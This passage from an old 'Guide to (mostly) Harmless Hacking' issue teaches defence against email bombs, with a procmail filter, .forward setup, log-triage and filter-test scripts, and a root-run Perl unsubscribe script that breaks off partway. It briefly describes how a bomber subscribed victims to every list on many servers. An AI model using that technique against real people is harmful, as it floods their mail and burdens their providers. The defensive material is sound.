Contents of Volume 3:

    How to protect yourself from email bombs!
    How to map the Internet.
    How to keep from getting kicked off IRC!
    How to Read Email Headers and Find Internet Hosts
    The Dread GTMHH on Cracking
    How to Be a Hero in Computer Lab
________________________________________
GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 Number 1

How to protect yourself from email bombs!
________________________________________

Email bombs! People like angry johnny, AKA the “Unamailer,” have made the news lately by arranging for 20 MB or more of email -- tens of thousands of messages -- to flood every day into their victims’ email accounts.

Email bombing can be bad news for two reasons. One, the victim can’t easily find any of their legitimate email in that giant garbage heap of spam. Two, the flood of messages ties up mail servers and chews up communications bandwidth.

Of course, those are the two main reasons that email bombers make their attacks: to mess up people’s email and/or harm the ISPs they target. The email bomb is a common weapon of war against Internet hosts controlled by spammers and con artists. It also is used by lusers with a grudge.

News stories make it sound like email bombing victims are, ahem, s*** out of luck. But we aren’t. We know, because angry -- the Christmas email bomber -- told the press that he had targeted the Happy Hacker list’s Supreme Commanderess, Carolyn Meinel. (Someone simultaneously attempted to email bomb the Happy Hacker list itself but no one has stepped forward to take credit for the attempt).

But as you know from the fact that we got the Happy Hacker Digest out after the attack, and by the fact that I kept answering my email, there are ways to beat the email bombers.

Now most of these are techniques for use by experts only. But if you are, like most of us on this list, a newbie, you may be able to win points with your ISP by emailing its technical help people with some of the information within this guide. Maybe then they’ll forgive you if your shell log file gets to looking a little too exciting!

My first line of defense is to use several on-line services. That way, whenever one account is getting hacked, bombed, etc., I can just email all my correspondents and tell them where to reach me. Now I’ve never gotten bombed into submission, but I have gotten hacked badly and often enough that I once had to dump an ISP in disgust. Or, an ISP may get a little too anxious over your hacking experiments. So it’s a good idea to be prepared to jump accounts.

But that’s a pretty chicken way to handle email bombing. Besides, a member of the Happy Hacker list says that the reason angry johnny didn’t email bomb all the accounts I most commonly use is because he persuaded johnny to just bomb one for publicity purposes. But even if johnny had bombed all my favorite accounts, I could have been back on my feet in a hurry.

There are several ways that either your ISP or you can defeat these attacks.

The simplest defense is for your ISP to block mail bombs at the router. This only works, however, if the attack is coming from one or a few hosts. It also only works if your ISP agrees to help you out. Your ISP may just chicken out instead and close your account.

***************************
Newbie note: routers are specialized computers that direct traffic. A host is a computer on the Internet.
***************************

But what if the attack comes from many places on the Internet? That happened to me on Christmas day when angry johnny took credit for an email bombing attack that also hit a number of well-known US figures such as evangelist Billy Graham, President Bill Clinton and Speaker of the US House of Representatives Newt Gingrich. (I blush to find myself in such company.)

The way angry johnny worked this attack was to set up a program that would go to one computer that runs a program to handle email lists and automatically subscribe his targets to all lists handled by that computer. Then his program went to another computer that handles email lists and subscribed his targets to all the lists it handled, and so on.

I was able to fix my problem within a few minutes of discovery. johnny had subscribed my address cmeinel@swcp.com to all these lists. But I use my private domain, techbroker.com, to receive email. Then I pipe all of it from my nameserver at Highway Technologies to whatever account I find useful at the time. So all I had to do was go to the Highway Technologies Web site and configure my mail server to pipe email to another account.

**************************
Newbie note: a mail server is a computer that handles email. It is the one to which you hook your personal computer when you give it a command to upload or download your email.
**************************

***********************
Evil genius tip: You can quickly reroute email by creating a file in your shell account (you do have a shell account, don’t you? SHELL ACCOUNT! All good hackers should have a SHELL ACCOUNT!) named .forward. This file directs your email to another email account of your choice.
***********************

If angry johnny had email bombed cmeinel@techbroker.com, I would have piped all that crud to /dev/null and asked my correspondents to email carolyn@techbroker.com, etc. It’s a pretty flexible way of handling things. And my swcp.com accounts work the same way. That ISP, Southwest Cyberport, offers each user several accounts all for the same price, which is based on total usage. So I can create new email addresses as needed.

Warning -- this technique -- every technique we cover here -- will still cause you to lose some email. But I figure, why get obsessive over it? According to a study by a major paging company, a significant percentage of email simply disappears. No mail daemon warning that the message failed, nothing. It just goes into a black hole. So if you are counting on getting every piece of email that people send you, dream on.

But this doesn’t solve my ISP’s problem. They still have to deal with the bandwidth problem of all that crud flooding in. And it’s a lot of crud. One of the sysadmins at Southwest Cyberport told me that almost every day some luser email bombs one of their customers. In fact, it’s amazing that angry johnny got as much publicity as he did, considering how commonplace email bombing is. So essentially every ISP somehow has to handle the email bomb problem.
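The guide makes two points an ISP has to act on: a router block only helps when the flood comes from one or a few hosts, and a mailing-list bomb arrives from many list servers at once. The following is an added example, not from the guide, of how a sysadmin might triage a flood from the mail log before choosing a response. It reads simplified sendmail-style log lines (the layout, hosts and addresses are all constructed here), counts messages per recipient account, and reports how many distinct relay hosts are involved.

```python
"""Triage an email flood from MTA log lines (added example, not from the guide).

Reads simplified sendmail-style log lines, counts messages per recipient,
and reports how many distinct relay hosts are involved so an admin can
pick between a router/MTA block (few hosts) and per-user filtering (many).
"""
import re
from collections import Counter, defaultdict

# Constructed sample log in a simplified sendmail-like layout (not real data):
#   <date> <queue-id>: from=<sender>, relay=<host>, to=<recipient>
SAMPLE_LOG = """\
Dec 25 10:01:02 qa001: from=<owner-tomato@lists1.example.org>, relay=lists1.example.org, to=<victim@isp.example.net>
Dec 25 10:01:05 qa002: from=<owner-cactus@lists2.example.org>, relay=lists2.example.org, to=<victim@isp.example.net>
Dec 25 10:01:09 qa003: from=<gardening-owner@lists3.example.com>, relay=lists3.example.com, to=<victim@isp.example.net>
Dec 25 10:01:13 qa004: from=<owner-knitting@lists4.example.edu>, relay=lists4.example.edu, to=<victim@isp.example.net>
Dec 25 10:01:20 qa005: from=<trains-owner@lists5.example.net>, relay=lists5.example.net, to=<victim@isp.example.net>
Dec 25 10:01:24 qa006: from=<owner-poetry@lists6.example.org>, relay=lists6.example.org, to=<victim@isp.example.net>
Dec 25 10:02:00 qa007: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:02:01 qa008: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:02:02 qa009: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:02:03 qa010: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:02:04 qa011: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:02:05 qa012: from=<nobody@anon.example.com>, relay=anon.example.com, to=<second@isp.example.net>
Dec 25 10:05:00 qa013: from=<friend@home.example.org>, relay=home.example.org, to=<third@isp.example.net>
Dec 25 10:06:00 qa014: from=<mom@home.example.org>, relay=home.example.org, to=<third@isp.example.net>
"""

LINE_RE = re.compile(r"from=<([^>]*)>, relay=([^,]+), to=<([^>]*)>")
# Sender names that mailing-list software typically uses for its own traffic.
LIST_SENDER_RE = re.compile(r"(^owner-|-owner@|-request@|^(listserv|listproc|majordomo)@)")


def parse_log(text):
    """Return one dict per parseable line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append({"from": m.group(1).lower(),
                           "relay": m.group(2).lower(),
                           "to": m.group(3).lower()})
    return events


def triage(events, burst_threshold=5, few_hosts=2):
    """Flag recipients getting at least burst_threshold messages and say whether
    a router/MTA block (few relays) or per-user filtering (many relays) is the
    sensible first response.  Thresholds are deliberately low for the toy data."""
    per_rcpt = defaultdict(list)
    for e in events:
        per_rcpt[e["to"]].append(e)

    report = {}
    for rcpt, evs in per_rcpt.items():
        if len(evs) < burst_threshold:
            continue
        relays = Counter(e["relay"] for e in evs)
        list_like = sum(1 for e in evs if LIST_SENDER_RE.search(e["from"]))
        if len(relays) <= few_hosts:
            advice = "massmail from few hosts: block the relay at the router/MTA"
        else:
            advice = "mailing-list bomb from many hosts: filter per user, then unsubscribe"
        report[rcpt] = {"messages": len(evs), "relays": len(relays),
                        "list_like": list_like, "advice": advice,
                        "top_relays": relays.most_common(3)}
    return report


if __name__ == "__main__":
    for rcpt, info in triage(parse_log(SAMPLE_LOG)).items():
        print(f"{rcpt}: {info['messages']} msgs from {info['relays']} relays "
              f"({info['list_like']} list-like) -> {info['advice']}")
```

On the constructed sample the account hit from six list servers is reported as a mailing-list bomb (the case where a router block does nothing useful), while the account hit six times from one relay is reported as a massmail that the router or MTA can stop. The list-sender pattern is the same "owner-" convention the unsubscribe script at the end of this guide relies on.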

How was angry johnny able to get as much publicity as he did? You can get an idea from this letter from Lewis Koch, the journalist who broke the story (printed with his permission):

From: Lewis Z Koch <lzkoch@mcs.net>
Subject: Question

Carolyn:

First, and perhaps most important, when I called you to check if you had indeed been email bombed, you were courteous enough to respond with information.  I think it is a tad presumptuous for you to state that "as a professional courtesy I am _letting_ Lewis Koch get the full scoop."  This was a story that was, in fact, exclusive.

(Carolyn’s note: as a victim I knew technical details about the attack that Koch didn’t know. But since Koch tells me he was in contact with angry johnny in the weeks leading up to the mass email bombings of Christmas 1996, he clearly knew a great deal more than I about the list of johnny’s targets. I also am a journalist, but deferred to Koch by not trying to beat him to the scoop.)

Second, yes I am a subscriber and I am interested in the ideas you advance. But that interest does not extend to feeding you -- or any single individual or group -- "lots of juicy details." The details of any story lie in the writing and commentary I offer the public. "Juicy" is another word for sensationalism, a tabloid approach -- and something I carefully avoid.

(Carolyn’s note: If you wish to see what Koch wrote on angry johnny, you may see it in the Happy Hacker Digest of Dec. 28, 1996.)

The fact is I am extraordinarily surprised by some of the reactions I have received from individuals, some of whom were targets, others who are bystanders.

The whole point is that there are extraordinary vulnerabilities to and on the Net -- vulnerabilities which are being ignored...at the peril of us all.

Continuing: "However, bottom line is that the email bomber used a technique that is ridiculously lame -- so lame that even Carolyn Meinel could turn off the attack in mere minutes. Fry in dev/null, email bomber!"

johnny made the point several times that the attack was "simple."  It was deliberately designed to be simple. I imagine -- I know -- that if he, or other hackers had chosen to do damage, serious, real damage, they could easily do so. They chose not to.

One person who was attacked was angry with my report. He used language such as "his campaign of terror," "the twisted mind of 'johnny'," "psychos like 'johnny'," "some microencephalic moron," "a petty gangster" to describe johnny.

This kind of thinking ignores history and reality.  If one wants to use a term such as "campaign of terror" they should check into the history of the Unabomber, or the group that bombed the Trade Center, or the Federal Building in Oklahoma City...or look to what has happened in Ireland or Israel.  There one finds "terrorism."

What happened was an inconvenience -- equivalent, in my estimation, to the same kind of inconvenience people experienced when young people blocked the streets of major cities in protest against the war in Vietnam. People were inconvenienced -- but the protesters were making a point about an illegal and unnecessary war that even the prosecutors of the war, like Robert McNamara, knew from the beginning was a lost venture. Hundreds of thousands of people lost their lives in that war -- and if some people found themselves inconvenienced by people protesting against it -- I say, too d*** bad.

Thank you for forwarding my remarks to your list
 

Ahem. I’m flattered, I guess. Is Koch suggesting the Happy Hacker list -- with its habit of ***ing out naughty words -- and evangelist Billy Graham -- whose faith I share -- are of an Earth-shaking level of political bad newsness comparable to the Vietnam War?

So let’s say you don’t feel that it is OK for any two-bit hacker wannabe to keep you from receiving email. What are some more ways to fight email bombs?

For bombings using email lists, one approach is to run a program that sorts through the initial flood of the email bomb for those “Welcome to the Tomato Twaddler List!” messages which tell how to unsubscribe. These programs then automatically compose unsubscribe messages and send them out.

Another way your ISP can help you is to provide a program called Procmail (which runs on the Unix operating system). For details, Zach Babayco (zachb@netcom.com) has provided the following article. Thank you, Zach!

*******************************
Defending Against Email-Bombing and Unwanted Mail

Copyright (C) Zach Babayco, 1996

[Before I start this article, I would like to thank Nancy McGough for letting me quote liberally from her Filtering Mail FAQ, available at http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/filtering-faq/faq.html.  This is one of the best filtering-mail FAQs out there, and if you have any problems with my directions or want to learn more about filtering mail, this is where you should look.]

Lately, there are more and more people out there sending you email that you just don't want, like "Make Money Fast!" garbage or lame ezines that you never requested or wanted in the first place.  Worse, there is the email bomb.

There are two types of email bombs, the Massmail and the Mailing List bomb:

1) Massmail-bombing.  This is when an attacker sends you hundreds, or perhaps even thousands of pieces of email, usually by means of a script and fakemail.  Of the two types, this is the easier to defend against, since the messages will be coming from just a few addresses at the most.

2) Mailing List bombs.  In this case, the attacker will subscribe you to as many mailing lists as he or she can.  This is much worse than a massmail because you will be getting email from many different mailing lists, and will have to save some of it so that you can figure out how to unsubscribe from each list.

This is where Procmail comes in.  Procmail (pronounced prok-mail) is an email filtering program that can do some very neat things with your mail. For example, if you subscribe to several high-volume mailing lists, it can be set up to sort the mail into different folders so that the messages aren't all mixed up in your Inbox.  Procmail can also be configured to delete email from certain people and addresses.
 

Setting up Procmail
-------------------

First, you need to see if your system has Procmail installed.  From the prompt, type:

> which procmail

If your system has Procmail installed, this command will tell you where Procmail is located.  Write this down - you will need it later.

*NOTE* If your system gives you a response like "Unknown command: which" then try substituting 'which' with 'type', 'where', or 'whereis'.

If you still cannot find Procmail, then it is probably a good bet that your system does not have it installed.  However, you're not completely out of luck - look at the FAQ I mentioned at the beginning of this file and see if your system has any of the programs that it talks about.

Next, you have to set up a resource file for Procmail.  For the rest of this document, I will use the editor Pico.  You may use whichever editor you feel comfortable with.

Make sure that you are in your home directory, and then start up your editor.

> cd
> pico .procmailrc

Enter the following in the .procmailrc file:

# This line tells Procmail what to put in its log file.  Set it to on when
# you are debugging.
VERBOSE=off

# Replace 'mail' with your mail directory.
MAILDIR=$HOME/mail

# This is where the logfile and rc files will be kept
PMDIR=$HOME/.procmail

LOGFILE=$PMDIR/log
# INCLUDERC=$PMDIR/rc.noebomb
(yes, type the INCLUDERC line WITH the #)

Now that you've typed this in, save it and go back up to your home directory.

> cd
> mkdir .procmail

Now go into the directory that you just made, and start your editor up with a new file, rc.noebomb:

IMPORTANT:  Be sure that you turn off your editor's word wrapping during this part.  The first condition in this next example (the long line beginning with * ! ^((((Resent-) is a single line, even if it wraps on your screen; it must be typed as ONE line.  With Pico, use the -w flag.  Consult your editor's manual page for instructions on turning off its word wrapping. Make sure that when you edit it, you leave NO SPACES in that line.

> cd .procmail
> pico -w rc.noebomb

# noebomb - email bomb blocker

:0
* ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))
* ! ^From:.*(listproc|majordomo|cmeinel|johnb)
* ! ^TO(netnews|crypto-stuff|pcgames)
/dev/null

Let's see what these do.  The first line, :0, tells Procmail that this is the beginning of a "recipe".  A recipe is basically what it sounds like -- it tells the program what it should look for in each email message, and if it finds what it is looking for, it performs an action on the message - forwarding it to someone; putting it in a certain folder; or in this case, deleting it.

The second, third, and fourth lines (the ones beginning with a *) are called CONDITIONS.  The asterisk (*) tells Procmail that this is the beginning of a condition.  The ! tells it to do the OPPOSITE of what it would normally do.

Condition 1:

* ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))

Don't freak out over this, it is simpler than it seems at first glance. This condition tells Procmail to look at the header of a message, and see if it is from one of the administrative addresses like root or postmaster, and also check to see if it is from a mailer-daemon (the thing that sends you mail when a message you sent bounces). If a message IS from one of those addresses, the negated condition fails, the recipe does not fire, and the message goes on to your inbox instead of being deleted.

Advanced User Note:  Those of you who are familiar with Procmail are probably wondering why I require the user to type in that whole long condition, instead of using the FROM_MAILER macro.  Well, it looked like a good idea at first, but I just found out a few days ago that FROM_MAILER also checks the Precedence: header for the words junk, bulk, and list.  Many (if not all) mailing-list servers have either Precedence: bulk or Precedence: list, so if someone subscribes you to several hundred lists, FROM_MAILER would let most of the messages through, which is NOT what we want.

Condition 2:

* ! ^From:.*(listproc|majordomo|cmeinel|johnb)

This condition does some more checking of the From: line in the header. In this example, it checks for the words listproc, majordomo, cmeinel, and johnb.  If it is from any of those people, it gets passed on to your Inbox.  If not, it still has to get past Condition 3 before it's a goner.  This is where you would put the usernames of people who normally email you, and also the usernames of mailing-list servers, such as listproc and majordomo.  When editing this line, remember to: only put the username in the condition, not a person's full email address, and remember to put a | between each name.

Condition 3:

* ! ^TO(netnews|crypto-stuff|pcgames)

This final condition is where you would put the usernames of the mailing lists that you are subscribed to (if any).  For example, I am subscribed to the netnews, crypto-stuff, and pcgames lists.  When you get a message from most mailing lists, most of the time the list address will be in the To: or Cc: part of the header, rather than the From: part.  This line will check for those usernames and pass them through to your Inbox if they match.  Editing instructions are the same as the ones for Condition 2.

The final line, /dev/null, is essentially the trash can of your system.  If a piece of email does not match any of the conditions, (i.e. it isn't from a mail administrator, it isn't from a listserver or someone you write to, and it's not a message from one of your usual mailing lists) Procmail dumps the message into /dev/null, never to be seen again.
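Because all three conditions are negated, a message survives the recipe if ANY of the three patterns matches its headers, and the Advanced User Note above points out that Condition 1 deliberately ignores the Precedence: header. The script below is an added example, written for this guide and not part of Zach's article or of procmail itself, that dry-runs the same three patterns against constructed messages so you can see what the filter keeps and drops before switching it on. Condition 1 is copied from the recipe; the ^TO macro is expanded to the pattern the procmailrc(5) manual page documents for it; the list names and addresses are all made up.

```python
"""Dry-run the noebomb recipe's three conditions against sample messages.

Added example, not from the guide or from procmail.  A message goes to
the inbox if any of the three (negated) conditions matches its headers;
otherwise the recipe fires and it goes to /dev/null.
"""
import re

# procmail conditions are case-insensitive by default, and ^ / $ match at line boundaries.
FLAGS = re.IGNORECASE | re.MULTILINE

# Condition 1 (copied from the recipe): administrative senders and mailer daemons.
ADMIN_SENDER = re.compile(
    r"^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(.*[^.%@a-z0-9])?"
    r"(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner"
    r"|request|bounce|serv(ices?|er))([^.!:a-z0-9]|$))", FLAGS)

# Condition 2: From: lines naming list servers or people you correspond with.
KNOWN_SENDER = re.compile(r"^From:.*(listproc|majordomo|cmeinel|johnb)", FLAGS)

# Condition 3: procmail's ^TO macro (To/Cc/Bcc and relatives, as documented in
# procmailrc(5)) followed by the names of lists you actually subscribe to.
TO_MACRO = (r"^((Original-)?(Resent-)?(To|Cc|Bcc)|(X-Envelope|Apparently(-Resent)?)-To):"
            r"(.*[^-a-zA-Z0-9_.])?")
KNOWN_LIST = re.compile(TO_MACRO + r"(netnews|crypto-stuff|pcgames)", FLAGS)

CONDITIONS = [("admin_sender", ADMIN_SENDER),
              ("known_sender", KNOWN_SENDER),
              ("known_list", KNOWN_LIST)]


def procmail_decision(message):
    """Return ("inbox", <condition that saved it>) or ("/dev/null", reason).

    Only the header block (everything before the first blank line) is
    examined, which is procmail's default for conditions.
    """
    headers = message.split("\n\n", 1)[0]
    for name, rx in CONDITIONS:
        if rx.search(headers):
            return ("inbox", name)
    return ("/dev/null", "no condition matched")


# Constructed sample messages: header block, blank line, body.
SAMPLES = {
    "bounce": ("From MAILER-DAEMON@isp.example.net Sat Dec 28 10:00:00 1996\n"
               "From: Mail Delivery Subsystem <MAILER-DAEMON@isp.example.net>\n"
               "To: victim@isp.example.net\nSubject: Returned mail\n\nbody"),
    "friend": ("From: John B <johnb@home.example.org>\n"
               "To: victim@isp.example.net\nSubject: hi\n\nbody"),
    "list_post": ("From: Alice <alice@example.com>\n"
                  "To: pcgames@lists.example.org\nSubject: [pcgames] patch\n\nbody"),
    # A list you never joined, marked only by Precedence: bulk, which the recipe ignores.
    "unknown_bulk": ("From: Tomato Twaddler List <twaddler@lists.example.net>\n"
                     "To: victim@isp.example.net\nPrecedence: bulk\n"
                     "Subject: Welcome to the Tomato Twaddler List!\n\nbody"),
    # A list you never joined whose software sets Sender: owner-...; Condition 1 keeps it.
    "owner_sender": ("From: Bob <bob@example.com>\n"
                     "Sender: owner-knitting@lists.example.edu\n"
                     "To: victim@isp.example.net\nSubject: knitting tips\n\nbody"),
    "massmail": ("From: 31337@nowhere.example.com\n"
                 "To: victim@isp.example.net\nSubject: hahaha\n\nbody"),
}

if __name__ == "__main__":
    for name, msg in SAMPLES.items():
        print(f"{name:13s} -> {procmail_decision(msg)}")
```

Two results are worth noticing. The "Welcome to the Tomato Twaddler List!" message lands in /dev/null, which is exactly the behaviour the Advanced User Note wants and FROM_MAILER would not give you. But a list message whose software sets a Sender: owner-... header is rescued by Condition 1, because that pattern accepts "owner" and "request" as administrative names, so some list-bomb traffic can still reach the inbox; if you see that, tighten Condition 1 rather than Condition 3. For the real thing, use the Ebombtest folder procedure described further down rather than /dev/null until you are satisfied.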

Ok.  Now you should have created two files:  .procmailrc and rc.noebomb. We need one more before everything will work properly.  Save rc.noebomb and exit your editor, and go to your home directory.  Once there, start your editor up with the no word wrapping command.

> cd
> pico -w .forward

We now go to an excerpt from Nancy M.'s Mail Filtering FAQ:

    Enter a modified version of the following in your ~/.forward:

     "|IFS=' ' && exec /usr/local/bin/procmail -f- || exit 75 #nancym"

    == IMPORTANT NOTES ==
    * Make sure you include all the quotes, both double (") and single (').
    * The vertical bar (|) is a pipe.
    * Replace /usr/local/bin with the correct path for procmail (see step 1).
    * Replace `nancym' with your userid.  You need to put your userid in your .forward so that it will be different from any other .forward file on your system.
    * Do NOT use ~ or environment variables, like $HOME, in your .forward file.  If procmail resides below your home directory write out the *full* path.

    On many systems you need to make your .forward world readable and your home directory world searchable in order for the mail transport agent to "see" it.  To do this type:

      cd
      chmod 644 .forward
      chmod a+x .

If the .forward template above doesn't work the following alternatives might be helpful:

In a perfect world:
        "|exec /usr/local/bin/procmail #nancym"
In an almost perfect world:
        "|exec /usr/local/bin/procmail USER=nancym"
In another world:
        "|IFS=' ';exec /usr/local/bin/procmail #nancym"
In a different world:
        "|IFS=' ';exec /usr/local/bin/procmail USER=nancym"
In a smrsh world:
        "|/usr/local/bin/procmail #nancym"
 

Now that you have all the necessary files made, it's time to test this filter.  Go into your mailreader and create a new folder called Ebombtest.  This procedure differs from program to program, so you may have to experiment a little.  Then open up the rc.noebomb file and change /dev/null to Ebombtest.  (You should have already changed Conditions 2 and 3 to what you want; if not, go do it now!)  Finally, open up .procmailrc and remove the # from the last line.

You will need to leave this on for a bit to test it.  Ask some of the people in Condition 2 to send you some test messages.  If the messages make it through to your Inbox, then that condition is working fine.  Send yourself some fake email under a different name and check to see if it ends up in the Ebombtest folder.  Also, send yourself some fakemail from root@wherever.com to make sure that Condition 1 works.  If you're on any mailing lists, those messages should be ending up in your Inbox as well.

If all of these test out fine, then congratulations!  You now have a working defense against email bombs.  For the moment, change the Ebombtest line in the rc.noebomb file back to /dev/null, and put the # in front of the INCLUDERC line in the .procmailrc file. If someone ever decides to emailbomb you, you only need to remove the #, and you will have greatly cut down on the amount of messages coming into your Inbox, giving you a little bit of breathing room to start unsubscribing to all those lists, or start tracking down those idiots who did it and get their asses kicked off their ISP's.

If you have any comments or questions about this, email me at zachb@netcom.com.  Emailbombs WILL go to /dev/null, so don't bother!

Disclaimer:  When you activate this program, it is inevitable that a small amount of wanted mail MAY get put into /dev/null, due to the fact that it is nearly impossible to know the names of all the people that may write to you.  Therefore, I assume no responsibility for any email which may get lost, and any damages which may come from those lost messages.

********************
Don’t have procmail? If you have a Unix box, you can download procmail from ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/
*******************

A note of thanks goes to Damien Sorder (jericho@dimensional.com) for his assistance in reviewing this guide.

And now, just to make certain you can get this invaluable Perl script to automatically unsubscribe email lists, here is the listing:
#!/usr/local/bin/perl

#  unsubscribe
#
# A perl script by Kim Holburn, University of Canberra 1996.
# kim@canberra.edu.au
# Feel free to use this and adjust it.  If you make any useful adjustments or
# additions send them back to me.
#
# This script will unsubscribe users in bulk from whatever mail lists they are
# subscribed to.  It also mails them that it has done this.
# It is useful for sys admins of large systems with many accounts and
# floating populations, like student servers.
# This script must be run by root although I don't check for this.
# You have to be root to read someone else's mailbox and to
# su to their account, both of which this script need to do.
#
# This script when applied to a mailbox will look through it to find
# any emails sent by mailing lists, attempt to determine the address of the
# mailing list and then send an unsubscribe message from that user.
# If invoked with no options only the mailbox name(s) it will assume
# the mailbox filename is the same as the username, as it is on a sun.
#
# Technical details:
# To find emails from mailing lists it looks for "owner" as part of
# the originating email address in the BSD From line (envelope).
# list servers that don't do this will be missed if you can figure a way
# round this let me know.
# The script doesn't do any file locking but then it only reads the mailbox
# file.

sub fail_usage {
  # Print an optional error message, then the usage summary, and exit non-zero.
  if (@_) { print "Error : ", @_, "\n"; }
  print "Usage : $0 [-d] mailboxes\n";
  print "Usage : $0 [-d] -u user mailbox\n";
  print "Usage : $0 [-d] -u user -l listname -h host -a listserver\n";
  print "where listserver is the full email address of the listserver\n";
  exit 1;
}

sub unsub {
  # Send "unsubscribe <list>" to the list server address, as the user.
  local ($myuser, $mylist, $myhost, $myaddress) = @_;

  if (!$debug) {
    if (!open (SEND,
 "|(USER=$myuser;LOGNAME=$myuser;su $myuser -c \"/usr/ucb/mail $myaddress\")"))
      { print "Couldn't open mailer for user \"$myuser\"\n"; return; }
    print SEND "unsubscribe $mylist\n" ;
    close SEND;
  } else {
    # The @ is escaped so Perl does not interpolate an array named after the host.
    print "No unsub \"$myuser\" on \"$mylist\@$myhost\" to :\n";
    print "      $myaddress\n";
  }
}

sub notify {
  # Tell the user, by local mail, which list they were removed from and how
  # to get back on it.
  local($myuser, $mylist, $myhost, $myaddress) = @_;
  if (!$debug) {
    if (!open (SEND, "|/usr/ucb/mail -s \"unsubscribed $mylist\" $myuser"))
      { print "Couldn't open mailer for user \"$myuser\"\n"; return; }
    # The @ is escaped so Perl does not interpolate an array named after the host.
    $mess = <<EOM;
You have been automatically unsubscribed from the mailing list :
$mylist\@$myhost
to resubscribe follow the original directions or
EOM
    print SEND $mess;
    if ($myaddress !~ /,/) {
      print SEND "send a message to the address $myaddress \n" ;
    } else {
      print SEND "send a message to the appropriate one of the addresses:\n";
      print SEND "$myaddress \n" ;
    }
    $mess4 = <<EOM2;
with no subject, no signature and a single line :
subscribe (your name)

EOM2
    print SEND $mess4 ;
    close SEND;
  } else {
    print "No notify \"$myuser\" on \"$mylist\@$myhost\" to :\n";
    print "      $myaddress\n";
  }
}

$debug=0;
$usersupplied=0;
$user=''; $list=''; $host=''; $address='';
# Options must come before the mailbox names.
while (($#ARGV > (-1)) && ($ARGV[0] =~ /^-/)) {
  if ($ARGV[0] eq '-d') { shift @ARGV; $debug=1; }
  elsif ($#ARGV < 1) { &fail_usage("option \"$ARGV[0]\" needs an argument"); }
  elsif ($ARGV[0] eq '-u') { shift @ARGV; $user=shift @ARGV; }
  elsif ($ARGV[0] eq '-l') { shift @ARGV; $list=shift @ARGV; }
  elsif ($ARGV[0] eq '-h') { shift @ARGV; $host=shift @ARGV; }
  elsif ($ARGV[0] eq '-a') { shift @ARGV; $address=shift @ARGV; }
  else { &fail_usage(); }
}
$usersupplied = ($user ne '') ;

#print "debug d=\"$debug\" u=\"$user\" l=\"$list\" h=\"$host\"\n";
#print "debug \$#ARGV=$#ARGV a=\"$address\" \n";
# No mailbox given: unsubscribe one user from one list named on the command line.
if ($#ARGV == (-1)) {
  if ($usersupplied && $list ne '' && $host ne '' && $address ne '') {
    $list =~ s/@.*$//;
    $user =~ s/@.*$//;
    $host =~ s/^.*@//;
    if ($address !~ /@/) { &fail_usage("bad address"); }
    &unsub ($user, $list, $host, $address);
    &notify ($user, $list, $host, $address);
    exit;
  } else { &fail_usage("no files and no addresses"); }
}

if ($usersupplied && $#ARGV > 0) { &fail_usage(); }

foreach $file (@ARGV) {
  %addresses=();
  if (!$usersupplied) { $user=$file; }
  $user =~ s@^.*/@@;
  if ($file =~ /^\./) { print "skipping wrong type of file \"$file\"\n"; next; }
  if ($file =~ /\.lock/)
    { print "skipping lock file \"$file\"\n"; next; }
  if ($file =~ /\./) { print "skipping wrong type of file \"$file\"\n"; next; }
  $user =~ s/^\.//;
  $user =~ s/\..*$//;
  if (!open (MYFILE, "<$file" ))
    { print "Couldn't open file \"$file\"\n"; next; }
  print "--------------------------opening file \"$file\"\n";
  # First pass: collect candidate list addresses from "owner-"/"-owner" and
  # "l-"/"-l" style sender names.  The @ signs are escaped so Perl does not
  # try to interpolate them as arrays.
  while (<MYFILE>) {
#    if (/(\bnews-[-\w.]+\@)|([-\w.]+-news\@)/i)
#    if (/(\brequest-[-\w.]+\@)|([-\w.]+-request\@)/i)
    if (/(\bowner-[-\w.]+\@)|([-\w.]+-owner\@)/i) {
      chomp;
      tr/A-Z/a-z/;
      if (/\bowner-[-\w.]+\@/) { s/^.*\bowner-([-\w.]+\@[\w.]+)\b.*$/$1/; }
      else { s/(^|^.*[^-\w.])([-\w.]+)-owner(\@[\w.]+)\b.*$/$2$3/; }
      # Keep only plain addresses; anything else is unsafe to hand to a shell.
      if (/[^a-z0-9\@.-]/) { next; }
      if (!defined ($addresses{$_})) { $addresses{$_}=""; }
    }
    if (/(\bl-[-\w.]+\@)|([-\w.]+-l\@)/i) {
      chomp;
      tr/A-Z/a-z/;
      if (/\bl-[-\w.]+\@/) { s/^.*\bl-([-\w.]+\@[\w.]+)\b.*$/$1/; }
      else { s/(^|^.*[^-\w.])([-\w.]+)-l(\@[\w.]+)\b.*$/$2$3/; }
      if (/[^a-z0-9\@.-]/) { next; }
      if (!defined ($addresses{$_})) { $addresses{$_}=""; }
    }
  }
  close MYFILE;
  while (($key,$value)=each %addresses) { print "$key\n"; }
  if (! keys %addresses ) { print "no listservers\n";  next; }
  if (! open (MYFILE, "<$file" ))
   { print "Couldn't open file \"$file\"\n"; next; }
  print "looking for listserver addresses\n";
  # Second pass: for each list host, look for a listserv/listproc/majordomo
  # address on the same host so the unsubscribe goes to the right place.
  while (<MYFILE>) {
    foreach $address (keys %addresses) {
      $host=$address;
      $host =~ s/^.*@//;
      # \Q...\E makes the dots in the host name match literally.
      if (/(listserv|listproc|majordomo)\@\Q$host\E/i) {
        $addresses{$address}=$1;
#        print "found 1 = \"$1\"\n";
      }
    }
  }
  close MYFILE;
